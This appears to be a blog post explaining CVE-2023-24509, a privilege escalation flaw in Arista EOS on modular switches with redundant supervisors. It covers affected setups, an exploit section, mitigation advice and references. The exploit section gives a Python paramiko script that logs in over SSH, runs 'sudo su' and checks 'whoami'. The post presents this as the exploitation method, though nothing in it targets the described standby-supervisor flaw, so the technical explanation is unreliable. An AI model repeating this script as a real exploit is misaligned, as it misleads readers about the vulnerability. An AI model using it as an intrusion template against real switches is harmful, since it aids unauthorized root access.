There has been a recently discovered privilege escalation vulnerability in Arista EOS (Extensible Operating System), the network operating system used by Arista Networks for their Modular Switch_Router platforms. This vulnerability has been assigned the identifier CVE-2023-24509. In this post, we will delve into the details of this vulnerability, including the affected environments, exploit details, and potential mitigations. We will also provide a code snippet to help understand the mechanism of exploitation.

Affected Environment

This vulnerability affects Modular platforms running Arista EOS equipped with both redundant supervisor modules and having the redundancy protocol configured with RPR (Route Processor Redundancy) or SSO (Stateful Switchover). The vulnerability enables an existing unprivileged user to login to the standby supervisor as a root user, leading to a privilege escalation. It is important to note that valid user credentials are required in order to exploit this vulnerability.

Exploit Details

An attacker with valid user credentials in the affected environment can log in to the standby supervisor module as a root user. Once logged in, the attacker gains unauthorized privileged access, which may subsequently lead to disclosure or manipulation of sensitive information, system instability, or even complete system compromise.

The following code snippet illustrates the process of exploitation (assuming a Python environment)

import paramiko

# User credentials (attacker should have these already)
username = "username"
password = "password"

# IP address of the target device. Replace with the actual IP address of the target device.
target_device_ip = "192.168.1.1"

# Start an SSH connection to the standby supervisor on the target device
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(target_device_ip, username=username, password=password)

# Execute the privilege escalation exploit
stdin, stdout, stderr = ssh.exec_command("sudo su", get_pty=True)

# Interactive shell to take advantage of the escalated privileges
channel = stdout.channel
channel.send('\n')

# Example command to show the attacker has root access
channel.send("whoami\n")
output = channel.recv(1024)
print(output)

Original References

Arista Networks has published an advisory detailing the vulnerability and its mitigation on their website: https://www.arista.com/en/support/security-bulletins

The CVE entry published by MITRE can be found here: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24509

Mitigation

Arista Networks recommends upgrading to EOS versions 4.24.6M, 4.25.1F, or later, which have addressed the vulnerability. If upgrading is not feasible, restricting the target environment's user access and implementing strong password policies can help minimize the risk of exploitation.

As a user of Arista EOS, it is essential to monitor the security advisories published by Arista Networks to stay informed about new vulnerabilities, patches, and mitigations.

Conclusion

In summary, CVE-2023-24509 is a critical privilege escalation vulnerability affecting Arista EOS on Modular platforms equipped with redundant supervisor modules and having RPR or SSO configured. The exploitation requires valid user credentials and can potentially result in severe consequences, such as data manipulations or even a total system compromise. Updating the affected EOS versions and imposing strict access control measures are advised to mitigate the risk associated with this vulnerability.

Timeline

Published on: 04/13/2023 20:15:00 UTC
Last modified on: 04/25/2023 14:19:00 UTC